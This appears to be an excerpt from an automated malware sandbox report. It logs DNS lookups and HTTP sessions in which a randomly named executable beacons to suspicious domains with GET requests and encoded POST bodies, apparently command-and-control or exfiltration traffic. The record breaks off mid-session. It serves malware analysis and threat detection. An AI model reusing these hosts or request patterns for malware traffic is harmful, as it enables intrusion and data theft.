                                                        Dec 10, 2024 18:49:47.016772032 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:47.185715914 CET8049775209.74.79.41192.168.11.20

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 10, 2024 18:48:26.337469101 CET5826553192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:48:26.917366028 CET53582651.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:48:42.592319012 CET5532653192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:48:42.792468071 CET53553261.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:48:57.026803970 CET5920853192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:48:57.180835962 CET53592081.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:49:11.164047956 CET5317453192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:49:11.414119005 CET53531741.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:49:24.817354918 CET5491553192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:49:24.986771107 CET53549151.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:49:38.236323118 CET6521453192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:49:38.473293066 CET53652141.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:49:52.499034882 CET5231753192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:49:52.649940014 CET53523171.1.1.1192.168.11.20
                                                        Dec 10, 2024 18:50:06.292690039 CET6377853192.168.11.201.1.1.1
                                                        Dec 10, 2024 18:50:06.456468105 CET53637781.1.1.1192.168.11.20

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 10, 2024 18:48:26.337469101 CET192.168.11.201.1.1.10xac26Standard query (0)www.y6h6kn.topA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:42.592319012 CET192.168.11.201.1.1.10x27f9Standard query (0)www.thesnusgang.funA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:57.026803970 CET192.168.11.201.1.1.10x7caStandard query (0)www.telepzow.fitA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:11.164047956 CET192.168.11.201.1.1.10x25e8Standard query (0)www.dnft.immoA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:24.817354918 CET192.168.11.201.1.1.10x528fStandard query (0)www.deadshoy.techA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:38.236323118 CET192.168.11.201.1.1.10x5b5eStandard query (0)www.freshteps.lifeA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:52.499034882 CET192.168.11.201.1.1.10x36e7Standard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:50:06.292690039 CET192.168.11.201.1.1.10x7699Standard query (0)www.cruycq.infoA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 10, 2024 18:48:26.917366028 CET1.1.1.1192.168.11.200xac26No error (0)www.y6h6kn.top162.251.95.62A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:26.917366028 CET1.1.1.1192.168.11.200xac26No error (0)www.y6h6kn.top103.23.149.28A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:42.792468071 CET1.1.1.1192.168.11.200x27f9No error (0)www.thesnusgang.funthesnusgang.funCNAME (Canonical name)IN (0x0001)false
                                                        Dec 10, 2024 18:48:42.792468071 CET1.1.1.1192.168.11.200x27f9No error (0)thesnusgang.fun84.32.84.32A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:57.180835962 CET1.1.1.1192.168.11.200x7caNo error (0)www.telepzow.fit104.21.64.208A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:48:57.180835962 CET1.1.1.1192.168.11.200x7caNo error (0)www.telepzow.fit172.67.155.214A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:11.414119005 CET1.1.1.1192.168.11.200x25e8No error (0)www.dnft.immo94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                        Dec 10, 2024 18:49:11.414119005 CET1.1.1.1192.168.11.200x25e8No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:24.986771107 CET1.1.1.1192.168.11.200x528fNo error (0)www.deadshoy.tech199.59.243.227A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:38.473293066 CET1.1.1.1192.168.11.200x5b5eNo error (0)www.freshteps.life209.74.79.41A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:52.649940014 CET1.1.1.1192.168.11.200x36e7No error (0)www.cifasnc.info172.67.128.109A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:49:52.649940014 CET1.1.1.1192.168.11.200x36e7No error (0)www.cifasnc.info104.21.1.251A (IP address)IN (0x0001)false
                                                        Dec 10, 2024 18:50:06.456468105 CET1.1.1.1192.168.11.200x7699No error (0)www.cruycq.info47.83.1.90A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.y6h6kn.top
                                                        • www.thesnusgang.fun
                                                        • www.telepzow.fit
                                                        • www.dnft.immo
                                                        • www.deadshoy.tech
                                                        • www.freshteps.life

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.11.2049755162.251.95.62807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:27.238774061 CET440OUTGET /jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.y6h6kn.top
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:48:27.547852993 CET312INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 10 Dec 2024 17:48:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 148
                                                        Connection: close
                                                        ETag: "674427dd-94"
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.11.204975684.32.84.32807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:43.057383060 CET714OUTPOST /z4qr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.thesnusgang.fun
                                                        Origin: http://www.thesnusgang.fun
                                                        Referer: http://www.thesnusgang.fun/z4qr/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 6d 6e 45 77 69 73 42 61 63 67 36 48 77 33 34 70 54 66 58 75 2b 4e 44 59 58 37 50 66 6a 38 53 5a 41 3d 3d
                                                        Data Ascii: QT=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYmnEwisBacg6Hw34pTfXu+NDYX7Pfj8SZA==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.11.204975784.32.84.32807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:45.839210987 CET734OUTPOST /z4qr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.thesnusgang.fun
                                                        Origin: http://www.thesnusgang.fun
                                                        Referer: http://www.thesnusgang.fun/z4qr/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 69 38 6c 77 45 4b 63 76 53 6d 6d 4f 36 69 42 37 6a 6c 58 59 61 69 76 44 37 32 2b 62 61 33 7a 2f 35 69 2b 76 70 54 79 7a 64 61 38 7a 6e 62 57 61 44 43 48 7a 49 70 6f 57 74 6e 73 53 39 72 4a 4c 70 70 61 6b 33 61 39 72 76 43 57 45 51 35 76 78 7a 41 49 72 36 38 54 32 61 31 6e 39 58 64 74 37 46 32 6a 53 6c 56 63 39 75 6b 78 38 78 4e 67 42 32 45 50 42 55 44 77 61 77 4f 59 47 70 39 76 4e 30 36 71 31 6b 7a 68 62 67 7a 70 34 68 63 78 43 39 51 76 31 42 6d 53 78 67 51 73 4a 54 38 6f 42 50 47 36 69 30 68 72 7a 74 74 52 78 63 6e 43 6e 64 68 39 4a 45 50 70 63 41 63 47 30 63 66 6c 57 36 2f 42 67 53 6b 4d 7a 49 61 30 3d
                                                        Data Ascii: QT=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba3z/5i+vpTyzda8znbWaDCHzIpoWtnsS9rJLppak3a9rvCWEQ5vxzAIr68T2a1n9Xdt7F2jSlVc9ukx8xNgB2EPBUDwawOYGp9vN06q1kzhbgzp4hcxC9Qv1BmSxgQsJT8oBPG6i0hrzttRxcnCndh9JEPpcAcG0cflW6/BgSkMzIa0=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.11.204975884.32.84.32807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:48.639307976 CET5156OUTPOST /z4qr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.thesnusgang.fun
                                                        Origin: http://www.thesnusgang.fun
                                                        Referer: http://www.thesnusgang.fun/z4qr/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 69 38 6c 77 45 4b 63 76 53 6d 6d 4f 36 69 42 37 6a 6c 58 59 61 69 76 44 37 32 2b 62 61 32 4c 2f 35 7a 65 76 70 30 6d 7a 63 61 38 7a 74 37 57 66 44 43 47 32 49 70 77 61 74 67 6b 6b 39 74 46 4c 7a 4b 53 6b 79 75 4a 72 6b 43 57 45 5a 5a 76 30 75 51 4a 76 36 38 44 79 61 30 4c 39 58 64 74 37 46 7a 6e 53 31 30 63 39 69 45 78 37 77 4e 67 4e 37 6b 4f 6f 55 44 6f 67 77 49 46 37 71 4e 50 4e 30 61 36 31 6d 47 31 62 6d 6a 70 36 30 63 78 4b 39 51 72 71 42 69 4c 49 67 51 70 63 54 39 67 42 4d 41 6a 37 74 51 4b 73 33 75 39 53 58 31 66 59 62 47 42 48 4c 4a 4e 37 4b 73 2b 74 41 2f 77 45 35 76 39 47 46 58 68 35 56 75 43 53 47 49 33 50 37 6e 2b 68 2b 66 65 74 58 54 6b 30 47 4f 68 6f 31 73 69 59 43 4c 57 76 51 69 4d 46 35 58 4e 51 49 66 70 6e 79 57 78 50 57 34 76 6f 31 64 4d 4e 36 68 6a 6a 35 6d 32 6f 77 2b 71 5a 45 41 4a 46 36 6c 49 77 43 43 38 31 66 62 52 4a 66 64 51 47 38 32 6e 75 4d 4f 76 66 65 7a 4b 73 45 34 72 39 66 71 37 67 49 6f 59 35 56 50 2f 41 51 48 47 6b 75 77 47 [TRUNCATED]
                                                        Data Ascii: QT=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba2L/5zevp0mzca8zt7WfDCG2Ipwatgkk9tFLzKSkyuJrkCWEZZv0uQJv68Dya0L9Xdt7FznS10c9iEx7wNgN7kOoUDogwIF7qNPN0a61mG1bmjp60cxK9QrqBiLIgQpcT9gBMAj7tQKs3u9SX1fYbGBHLJN7Ks+tA/wE5v9GFXh5VuCSGI3P7n+h+fetXTk0GOho1siYCLWvQiMF5XNQIfpnyWxPW4vo1dMN6hjj5m2ow+qZEAJF6lIwCC81fbRJfdQG82nuMOvfezKsE4r9fq7gIoY5VP/AQHGkuwGpLtzo73bwuH/XiKlaciKU9YySHXX+DYj553Lx1laeMb7j+fkOQ3xenUvYGdUnqEaAuVgzP4Ruilghe+wpzuBQokeOnHKm48rNyHpyEDDTbvMFPLTf2uxWD3+34/js268lvlMg50wRfIk0pkxfbwWRccaCWKzS9BNHLzIRWWkXk5mNIBhwu8/uECB50EX/olaxBpa80DR/TyCkiZUJtltOCit0RQbB3V/BO+KPxmj6oqshD3FhpV9Dz+PM5QCb9peHTVqDO8Wddc2EKgMdniPeK42fSQ2q9p16HVKuvSiEpRfB2ZBp2JnrFraqrT/GOLp3F0LqemWEobxKkyL5lBnnHAUhQnharAVGP/eZGBF5urm67X+Xoz6Mb/8JBCcIYvmw3uzqm5tjvL83/IitkQZeEUI2QlJIku7LF3x99PpoKW3FFREzJTW9xppxQReDll32EC4Usxy+ydbEMEoqzDT+u0al+76bv/KRS+Zisx4g8yk7W/zbRNgz4lSQUnmUzbfQq213W/FZbrkCTEr3fzRAAaRv8O5HlAtRerNOvwyaoLq4jfCYBNpyrXUlRZ7yE+EV4sL7Lk8Nz2ggUhchoqoybbfmRcTiwDp+CSftkkiy+6ZXuxB1ai7wlmUM3xgh8aQ1VeZhvqkVrj3ufxZwlqxXvqHGm70C8DK50 [TRUNCATED]
                                                        Dec 10, 2024 18:48:48.639369965 CET2727OUTData Raw: 65 36 63 42 7a 71 7a 65 71 54 38 49 59 47 42 4b 57 69 77 45 54 50 52 6f 71 61 46 7a 37 2f 6e 72 5a 37 36 7a 54 69 31 72 54 48 68 4f 36 51 39 70 34 50 6b 4f 6a 33 6f 4e 76 4a 58 49 36 65 6e 48 37 74 73 47 6c 41 35 37 35 6b 5a 6b 4c 53 61 51 55 42
                                                        Data Ascii: e6cBzqzeqT8IYGBKWiwETPRoqaFz7/nrZ76zTi1rTHhO6Q9p4PkOj3oNvJXI6enH7tsGlA575kZkLSaQUBh2jf0Q4TNbjLcglg1BirrYrJGxeOTx038mLxOU3kXqu97YjgvN3CEPjeXQbpjG1DaVKBjLvNS6QzFB+ugWumJhpF8X4ptfsCRntul8U73mSeFy0ZiTkitOdRBhhcGodWmcYc+DjBmqiPxKFhk5UMiJ8Gt6RWqlX7/


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.11.204975984.32.84.32807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:51.429709911 CET445OUTGET /z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.thesnusgang.fun
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:48:51.683777094 CET536INHTTP/1.1 200 OK
                                                        Date: Tue, 10 Dec 2024 17:48:51 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9973
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Server: hcdn
                                                        alt-svc: h3=":443"; ma=86400
                                                        x-hcdn-request-id: 03bb24cb1d637e9a0594e010c590a3bd-asc-edge5
                                                        Expires: Tue, 10 Dec 2024 17:48:50 GMT
                                                        Cache-Control: no-cache
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65
                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinge
                                                        Dec 10, 2024 18:48:51.683813095 CET536INData Raw: 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20
                                                        Data Ascii: r DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/j
                                                        Dec 10, 2024 18:48:51.683846951 CET536INData Raw: 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78
                                                        Data Ascii: 0i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;
                                                        Dec 10, 2024 18:48:51.684216022 CET536INData Raw: 69 6e 2d 62 6f 74 74 6f 6d 3a 33 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 66 62 65 62 65 7d 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69
                                                        Data Ascii: in-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0}li{float:right;margin-left:20px;line-height:24px;font-size:14px;font-weight:400}a{text-decoration:none;cursor:pointer;-webkit-transition:all .3s ea
                                                        Dec 10, 2024 18:48:51.684262037 CET536INData Raw: 37 32 37 35 38 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78
                                                        Data Ascii: 727586;font-size:14px;line-height:24px;font-weight:400}.container{margin-top:100px}.navbar{position:relative;min-height:45px;margin-bottom:20px;border:1px solid transparent}.navbar-brand{float:left;height:auto;margin-top:5px;padding:10px 10px;
                                                        Dec 10, 2024 18:48:51.684295893 CET536INData Raw: 69 6e 3a 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67
                                                        Data Ascii: in:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;bo
                                                        Dec 10, 2024 18:48:51.684328079 CET536INData Raw: 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 32 34 70 78 3b 6d 61
                                                        Data Ascii: bottom:16px}.column-custom{border-radius:8px;background-color:#fff;padding:24px;margin-bottom:20px;border:1px solid #dadce0}.column-title{color:#2f1c6a;font-weight:700;font-size:16px;padding-bottom:5px;display:list-item;list-style-type:disc;li
                                                        Dec 10, 2024 18:48:51.684359074 CET536INData Raw: 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 33 34 34 64 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 7b 70 61 64
                                                        Data Ascii: rtant}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px
                                                        Dec 10, 2024 18:48:51.684390068 CET536INData Raw: 72 65 76 65 72 73 65 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 32 36 35 37 35
                                                        Data Ascii: reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44"
                                                        Dec 10, 2024 18:48:51.684423923 CET536INData Raw: 74 74 6f 6e 3e 20 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 20 63 6c 61 73 73 3d 6e 61 76 62 61 72 2d 62 72 61 6e 64 3e 3c 69 6d 67 20 73 72 63 3d
                                                        Data Ascii: tton> <a href=https://www.hostinger.com/ rel=nofollow class=navbar-brand><img src=hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><
                                                        Dec 10, 2024 18:48:51.937982082 CET536INData Raw: 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73
                                                        Data Ascii: m/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><di


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.11.2049760104.21.64.208807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:48:57.336606979 CET705OUTPOST /oizn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.telepzow.fit
                                                        Origin: http://www.telepzow.fit
                                                        Referer: http://www.telepzow.fit/oizn/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 2f 68 75 43 4f 67 64 63 42 6c 71 53 4f 49 78 6d 75 4b 38 59 63 4e 6b 55 4b 7a 55 6f 4b 6b 45 51 68 73 7a 41 76 76 47 45 31 63 57 52 6d 47 77 4e 72 4e 43 2b 74 78 6a 35 71 4b 72 64 63 69 6c 49 48 68 44 45 6c 65 65 54 41 59 4b 72 57 4c 43 4e 47 71 70 74 5a 7a 44 44 51 72 55 34 44 4b 4e 33 44 5a 4d 70 6f 6b 49 49 6c 61 73 51 49 4d 38 6b 36 68 43 70 38 52 51 4b 31 47 48 48 46 48 58 30 44 64 51 58 4e 73 52 53 4d 71 76 44 65 75 78 2f 79 6e 4c 52 4d 53 70 59 65 71 62 72 66 68 58 36 46 34 51 46 35 54 32 4c 6b 55 6f 69 75 45 39 6d 56 47 7a 4c 67 3d 3d
                                                        Data Ascii: QT=jSLLzUo1Ntko5/huCOgdcBlqSOIxmuK8YcNkUKzUoKkEQhszAvvGE1cWRmGwNrNC+txj5qKrdcilIHhDEleeTAYKrWLCNGqptZzDDQrU4DKN3DZMpokIIlasQIM8k6hCp8RQK1GHHFHX0DdQXNsRSMqvDeux/ynLRMSpYeqbrfhX6F4QF5T2LkUoiuE9mVGzLg==
                                                        Dec 10, 2024 18:48:57.993571043 CET914INHTTP/1.1 404 Not Found
